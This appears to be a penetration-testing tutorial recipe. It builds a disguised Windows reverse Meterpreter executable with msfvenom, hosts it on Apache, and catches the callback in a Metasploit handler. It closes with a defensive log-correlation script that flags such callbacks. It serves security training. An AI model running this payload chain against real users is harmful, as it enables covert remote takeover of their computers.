When we do a client-side attack, we have the ability to trick the user into executing programs and make those programs connect back to a controlling computer.
In this recipe, we will learn how to use Metasploit's msfvenom to create an executable program (a reverse meterpreter shell) that, when executed, will connect to our Kali computer and give us control of the user's computer.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4443 -f exe > cute_dolphin.exe
This will create a file named cute_dolphin.exe, which is a reverse meterpreter shell; reverse means that it will connect back to us instead of listening for us to connect.
Next, in msfconsole, we set up the handler that will receive the connection:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.56.1
set lport 4443
set ExitOnSession false
set AutorunScript post/windows/manage/smart_migrate
exploit -j -z
As you can see, the LHOST and LPORT are the ones we used to create the .exe file. They are the IP address and TCP port the program is going to connect to, so we will need to listen on that network interface and port of our Kali Linux machine.
To make the file available to the target, we start the Apache web server and copy the executable to its document root:
service apache2 start
cp cute_dolphin.exe /var/www/html/
The target can then download and run it from the following URL:
http://192.168.56.1/cute_dolphin.exe
The handler keeps running as a background job (the -j -z options). Let's check our active sessions:
sessions
To interact with one of them, we use the -i option with the number of the session:
sessions -i 1
Inside the meterpreter session we can, for example, get information about the system or open a system shell:
sysinfo
shell
Msfvenom helps us create payloads from the extensive list of Metasploit's payloads and incorporate them into source code in many languages, or create scripts and executable files, as we did in this recipe. The parameters we used here were the payload to use (windows/meterpreter/reverse_tcp), the host and port to connect back to (LHOST and LPORT), and the output format (-f exe); redirecting the standard output to a file saved it as cute_dolphin.exe.
The exploit/multi/handler module of Metasploit is a payload handler; in this case we used it to listen for the connection and, after the connection was established, it ran the meterpreter payload.
Meterpreter is Metasploit's version of a shell on steroids; it contains modules to sniff a victim's network, to use the victim as a pivot point to access the local network, to perform privilege escalation and password extraction, and many other useful things when performing penetration tests.
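As an added example from the defender's side, not part of this recipe or of Metasploit, the following Python correlates constructed proxy and firewall log lines to flag the pattern this recipe produces on the network: a client downloading an executable over HTTP from a host and, shortly after, opening a TCP connection to a non-web port on that same host. The log line format, the set of "normal" web ports and the 5-minute window are assumptions.

```python
import re
from datetime import datetime

# Constructed sample log lines (not from the recipe): "<timestamp> <src> <HTTP|TCP> <dst>:<port> <detail>".
SAMPLE_LOG = """\
2024-05-01T10:00:02 192.168.56.101 HTTP 192.168.56.1:80 GET /cute_dolphin.exe
2024-05-01T10:00:10 192.168.56.101 TCP 192.168.56.1:4443 SYN
2024-05-01T10:01:00 192.168.56.102 HTTP 10.0.0.5:80 GET /index.html
2024-05-01T10:01:05 192.168.56.102 TCP 10.0.0.5:443 SYN
2024-05-01T11:30:00 192.168.56.103 HTTP 192.168.56.1:80 GET /setup.exe
2024-05-01T13:00:00 192.168.56.103 TCP 192.168.56.1:4443 SYN
"""

LINE_RE = re.compile(r"^(\S+) (\S+) (HTTP|TCP) (\S+):(\d+) (.*)$")
EXE_RE = re.compile(r"\.(exe|dll|scr|msi)$", re.IGNORECASE)
WEB_PORTS = {80, 443, 8080}  # assumed "normal" outbound web ports

def parse(log):
    """Parse log text into (time, src, kind, dst, port, detail) tuples; malformed lines are skipped."""
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if m:
            ts, src, kind, dst, port, detail = m.groups()
            events.append((datetime.fromisoformat(ts), src, kind, dst, int(port), detail))
    return events

def find_callbacks(log, window_s=300):
    """Return (src, dst, port) for each client that fetched an executable over HTTP
    and then opened a non-web TCP connection to the same host within window_s seconds."""
    downloads = {}  # (src, dst) -> time of the latest executable download from dst
    hits = []
    for ts, src, kind, dst, port, detail in sorted(parse(log)):
        if kind == "HTTP" and EXE_RE.search(detail.rsplit(" ", 1)[-1]):
            downloads[(src, dst)] = ts
        elif kind == "TCP" and port not in WEB_PORTS:
            t0 = downloads.get((src, dst))
            if t0 is not None and (ts - t0).total_seconds() <= window_s:
                hits.append((src, dst, port))
    return hits

if __name__ == "__main__":
    for src, dst, port in find_callbacks(SAMPLE_LOG):
        print(f"suspicious callback: {src} -> {dst}:{port} shortly after an executable download")
```

With the default window only the first client is flagged; the third client's download and connection are 90 minutes apart, so it is reported only when the window is widened.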